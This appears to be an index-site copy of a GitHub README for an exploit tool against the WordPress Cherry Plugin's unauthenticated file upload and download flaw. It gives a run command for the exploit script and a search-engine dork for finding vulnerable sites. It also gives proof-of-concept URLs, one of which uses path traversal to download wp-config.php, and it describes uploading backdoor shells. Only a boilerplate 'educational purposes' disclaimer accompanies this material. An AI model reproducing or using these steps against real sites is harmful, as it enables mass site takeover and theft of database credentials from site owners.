An open API service indexing awesome lists of open source software.

https://github.com/inmymine7/cherry-plugin

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
https://github.com/inmymine7/cherry-plugin

cherry-plugins plugins-wordpress worpress-plugin

Last synced: 3 months ago
JSON representation

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.

Awesome Lists containing this project

README

        

# WordPress (CMS) Cherry-Plugin Arbitrary File Upload RCE

Requirement :
- `Python 2.7.18`
- `pip 19.2.3`

How To Usage :
```
python2 sxc.py
```
Example Dork
```
inurl:/wp-content/plugins/cherry-plugin/
```
Proof of Concept
```
Upload: The following file was affected: https://www.example.com/wp-content/plugins/cherry-plugin/admin/import-export/upload.php

Download: https://example.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
```
Classification
`Type : UPLOAD`
`CWE : CWE-434`

**DISCLAIMER : THIS TOOLS IS FOR EDUCATIONAL PURPOSES ONLY.
AND WE DO NOT CONDONE ANY ILLEGAL ACTIVITIES**